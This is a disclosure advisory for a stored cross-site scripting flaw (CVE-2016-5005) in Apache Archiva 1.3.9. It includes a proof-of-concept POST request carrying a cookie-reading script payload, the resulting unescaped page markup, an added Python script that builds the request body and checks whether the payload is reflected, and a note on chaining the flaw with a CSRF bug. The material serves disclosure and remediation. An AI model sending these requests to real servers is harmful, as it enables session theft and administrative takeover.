Apache Archiva 1.3.9 Cross Site Scripting

12 Jul 2016, reported by Julien Ahrens (source: packetstormsecurity.com)

RCE Security Advisory  
https://www.rcesecurity.com  
  
  
1. ADVISORY INFORMATION  
=======================  
Product: Apache Archiva  
Vendor URL: https://archiva.apache.org  
Type: Cross-Site Scripting [CWE-79]  
Date found: 2016-05-31  
Date published: 2016-07-11  
CVSSv3 Score: 5.5 (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N)  
CVE: CVE-2016-5005  
  
  
2. CREDITS  
==========  
This vulnerability was discovered and researched by Julien Ahrens from  
RCE Security.  
  
  
3. VERSIONS AFFECTED  
====================  
Apache Archiva v1.3.9  
Older versions may be affected too.  
  
  
4. INTRODUCTION  
===============  
Apache Archiva™ is an extensible repository management software that helps  
taking care of your own personal or enterprise-wide build artifact  
repository. It is the perfect companion for build tools such as Maven,  
Continuum, and ANT.  
  
(from the vendor's homepage)  
  
  
5. VULNERABILITY DETAILS  
========================  
The script "/archiva/admin/addProxyConnector_commit.action" is vulnerable to  
an authenticated persistent (stored) Cross-Site Scripting vulnerability when  
user-supplied input to the HTTP POST parameter "connector.sourceRepoId" is  
processed by the web application. The application neither validates this  
parameter on input nor HTML-encodes it when rendering it, so it is possible  
to place arbitrary script code permanently on the "Administration - Proxy  
Connectors" page as well as on the "Admin: Delete Proxy Connector" page;  
the payload executes every time an administrator views either page.  
  
The following Proof-of-Concept triggers this vulnerability and adds a new  
proxy connector called "XSS<script>alert(document.cookie)</script>":  
  
POST /archiva/admin/addProxyConnector_commit.action HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Cookie: JSESSIONID=1vabu6a1f9wye; rbkSignon=7574033ea6d44b4a9722cfa53a7b4001; _ga=GA1.2.1956020753.1461333249; __utma=86544839.1956020753.1461333249.1461575160.1461575160.1; __utmz=86544839.1461575160.1.1.utmcsr=premium_main|utmccn=(not%20set)|utmcmd=(not%20set)  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 567  
  
pattern=&connector.order=0&connector.proxyId=%28direct+connection%29&connector.sourceRepoId=XSS<script>alert(document.cookie)</script>&connector.targetRepoId=com.springsource.repository.bundles.external&connector.policies%5B%27propagate-errors-on-update%27%5D=always&connector.policies%5B%27cache-failures%27%5D=no&connector.policies%5B%27releases%27%5D=always&connector.policies%5B%27propagate-errors%27%5D=stop&connector.policies%5B%27checksum%27%5D=fail&connector.policies%5B%27snapshots%27%5D=always&propertyKey=&propertyValue=&blackListPattern=&whiteListPattern=  
  
The payload is then rendered without any HTML encoding on the  
"Administration - Proxy Connectors" page:  
  
<div class="managedRepo">  
<img src="/archiva/images/archiva-splat-32.gif">  
<p class="id">XSS<script>alert(document.cookie)</script></p>  
<p class="name"></p>  
</div>  
  
And on the "Admin: Delete Proxy Connector" page:  
  
<p>  
Are you sure you want to delete proxy connector <code>[  
XSS<script>alert(document.cookie)</script> ,  
maven2-repository.dev.java.net ]</code> ?  
</p>  
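The following Python script is an added example; it is not part of the advisory and not code from Apache Archiva. It reproduces the check offline on the markup quoted above (the "unescaped" verdict is what a vulnerable 1.3.9 instance produces), builds the PoC form body with the same parameters as the request in this section, and contrasts the rendering pattern that causes the bug with the output-encoding fix. The row template, the repository-id allow-list regex and all function names are assumptions made for the illustration, not Archiva's own template or validation rules.

```python
# Added example for CVE-2016-5005; not part of the advisory or of Apache
# Archiva. Template, regex and function names are assumptions.
import html
import re
from urllib.parse import parse_qs, urlencode

PAYLOAD = "XSS<script>alert(document.cookie)</script>"

# Markup copied from section 5 of the advisory: what Archiva 1.3.9 renders on
# the "Administration - Proxy Connectors" page after the PoC request.
ADVISORY_LIST_HTML = (
    '<div class="managedRepo">\n'
    '<img src="/archiva/images/archiva-splat-32.gif">\n'
    '<p class="id">XSS<script>alert(document.cookie)</script></p>\n'
    '<p class="name"></p>\n'
    '</div>'
)

# Simplified stand-in for the page template that prints a connector row
# (assumption: Archiva's real JSP is not reproduced here).
ROW_TEMPLATE = (
    '<div class="managedRepo">\n'
    '<img src="/archiva/images/archiva-splat-32.gif">\n'
    '<p class="id">{source_repo_id}</p>\n'
    '<p class="name"></p>\n'
    '</div>'
)

# Assumed allow-list for repository ids: defence in depth on input, not a
# substitute for encoding on output.
REPO_ID_RE = re.compile(r"[A-Za-z0-9._-]{1,64}")


def build_add_connector_body(source_repo_id,
                             target_repo_id="com.springsource.repository.bundles.external"):
    """Form body for POST /archiva/admin/addProxyConnector_commit.action with
    the same parameter set as the advisory's PoC, URL-encoded."""
    params = [
        ("pattern", ""),
        ("connector.order", "0"),
        ("connector.proxyId", "(direct connection)"),
        ("connector.sourceRepoId", source_repo_id),
        ("connector.targetRepoId", target_repo_id),
        ("connector.policies['propagate-errors-on-update']", "always"),
        ("connector.policies['cache-failures']", "no"),
        ("connector.policies['releases']", "always"),
        ("connector.policies['propagate-errors']", "stop"),
        ("connector.policies['checksum']", "fail"),
        ("connector.policies['snapshots']", "always"),
        ("propertyKey", ""),
        ("propertyValue", ""),
        ("blackListPattern", ""),
        ("whiteListPattern", ""),
    ]
    return urlencode(params)


def decode_body_param(body, name):
    """Decode one parameter back out of the form body (what the server sees)."""
    return parse_qs(body, keep_blank_values=True).get(name, [None])[0]


def reflection_state(page_html, submitted):
    """Classify how a fetched page renders the value that was submitted:
    'unescaped' -> live markup, the instance is vulnerable;
    'escaped'   -> only an HTML-encoded copy, the output encoding is in place;
    'absent'    -> the value does not appear (e.g. rejected on input)."""
    if submitted in page_html:
        return "unescaped"
    if html.escape(submitted, quote=True) in page_html:
        return "escaped"
    return "absent"


def is_valid_repo_id(value):
    return REPO_ID_RE.fullmatch(value) is not None


def render_row_vulnerable(source_repo_id):
    # The bug: the stored value is interpolated verbatim into element content.
    return ROW_TEMPLATE.format(source_repo_id=source_repo_id)


def render_row_fixed(source_repo_id):
    # The fix: HTML-encode at the point of output, so '<' and '>' become
    # entities and the browser shows the text instead of executing it.
    return ROW_TEMPLATE.format(source_repo_id=html.escape(source_repo_id, quote=True))


if __name__ == "__main__":
    body = build_add_connector_body(PAYLOAD)
    print("PoC body      :", body)
    print("1.3.9 page    :", reflection_state(ADVISORY_LIST_HTML, PAYLOAD))
    print("encoded output:", reflection_state(render_row_fixed(PAYLOAD), PAYLOAD))
    print("id allowed    :", is_valid_repo_id(PAYLOAD))
```

To test a live instance with this, submit build_add_connector_body() with an administrator's session cookie as in the PoC request, fetch the proxy connector list, and pass its HTML to reflection_state(); anything but "escaped" or "absent" means the page still renders the id unencoded. Use a harmless marker such as "<b>probe</b>" rather than the alert payload, and delete the connector afterwards.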
  
  
6. RISK  
=======  
To successfully exploit this vulnerability, a user with administrative  
rights must trick another authenticated user with administrative rights  
into visiting one of the affected pages. Since this scenario is quite  
unlikely, the attack likelihood can be increased by combining this  
vulnerability with the Cross-Site Request Forgery vulnerability described  
in RCESEC-2016-003 (CVE-2016-4469): a logged-in administrator's browser can  
then be made to submit the request above from an attacker-controlled page,  
so the attacker no longer needs an administrative account of their own.  
  
The vulnerability allows remote attackers to permanently embed arbitrary  
script code into the context of the Apache Archiva administrative backend  
interface. Because that code runs in the victim's authenticated session, it  
offers a wide range of possible attacks, such as stealing cookies, carrying  
out administrative actions on the victim's behalf, or attacking the browser  
and its components of a user visiting the page.  
  
  
7. SOLUTION  
===========  
Upgrade/Migrate to Apache Archiva 2.2.1. The vendor considers the 1.3.x  
branch out of support (see the report timeline), so no fix is available  
for the affected version itself.  
  
  
8. REPORT TIMELINE  
==================  
2016-05-31: Discovery of the vulnerability  
2016-05-31: Notified vendor via public security mail address  
2016-06-06: No response, sent out another notification  
2016-06-10: Vendor states that this version is out of support  
2016-07-07: Vendor assigns CVE-2016-5005  
2016-07-11: Advisory released  
  
  
9. REFERENCES  
=============  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5005  
  
